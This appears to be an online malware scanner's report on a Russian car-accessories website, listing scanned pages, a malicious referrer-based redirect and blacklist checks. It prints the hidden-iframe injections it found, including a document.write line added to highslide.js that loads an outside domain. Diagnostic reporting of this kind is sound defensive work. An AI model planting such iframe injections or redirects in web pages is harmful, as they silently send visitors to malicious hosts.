Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.carline4u.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.carline4u.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 19 Jun 2014 21:50:06 GMT Location: http://hecodat.de/zwmd.html?h=1679670 Server: nginx/1.4.5 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.carline4u.ru/ | 200 OK Content-Length: 8888 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x18 src: http://mwola.com/post.php?id=889683 <iframe name=twitter scrolling=auto frameborder=no align=center height=18 width=1 src=http://mwola.com/post.php?id=889683>
http://www.carline4u.ru/basket/ | 200 OK Content-Length: 7451 Content-Type: text/html | clean |
http://www.carline4u.ru/highslide/highslide.js | 200 OK Content-Length: 43008 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1679670></iframe>');
var hs = { graphicsDir : 'highslide/graphics/', restoreCursor : 'zoomout.cur', expandSteps : 10, expandDuration : 250, restoreSteps : 10, restoreDuration : 250, marginLeft : 15, marginRight : 15, marginTop : 15, marginBottom : 15, zIndexCounter : 1001, restoreTitle : 'Click to close imag hs.purge(this.wrapper); if (hs.ie && hs.ieVersion() < 5.5) this.wrapper.innerHTML = ''; else this.wrapper.parentNode.removeChild(this.wrapper); hs.expanders[this.key] = null; hs.cleanUp(); } }; var HsExpander = hs.Expander; hs.addEventListener(document, 'mousedown', hs.mouseClickHandler); hs.addEventListener(document, 'mouseup', hs.mouseClickHandler); hs.addEventListener(window, 'load', hs.preloadImages);
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1679670 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1679670>
http://www.carline4u.ru/delivery/ | 200 OK Content-Length: 9671 Content-Type: text/html | clean |
http://www.carline4u.ru/material/ | 200 OK Content-Length: 11979 Content-Type: text/html | clean |
http://www.carline4u.ru/about/ | 200 OK Content-Length: 7455 Content-Type: text/html | clean |
http://www.carline4u.ru/new_goods/ | 200 OK Content-Length: 7344 Content-Type: text/html | clean |
http://www.carline4u.ru/contacts/ | 200 OK Content-Length: 7815 Content-Type: text/html | clean |
http://www.carline4u.ru/ustanovka/ | 200 OK Content-Length: 7377 Content-Type: text/html | clean |
http://www.carline4u.ru/kovriki_v_salon_poliuretan/ | 200 OK Content-Length: 7800 Content-Type: text/html | clean |
http://www.carline4u.ru/rug_salon/ | 200 OK Content-Length: 10880 Content-Type: text/html | clean |
http://www.carline4u.ru/kovriki_v_bagazhnik_poliuretan/ | 200 OK Content-Length: 7825 Content-Type: text/html | clean |
http://www.carline4u.ru/rug_boot/ | 200 OK Content-Length: 10456 Content-Type: text/html | clean |
http://www.carline4u.ru/steel/ | 200 OK Content-Length: 7747 Content-Type: text/html | clean |
http://www.carline4u.ru/crankcase/ | 200 OK Content-Length: 12186 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=carline4u.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://carline4u.ru/
Result: carline4u.ru is not infected or malware details are not published yet.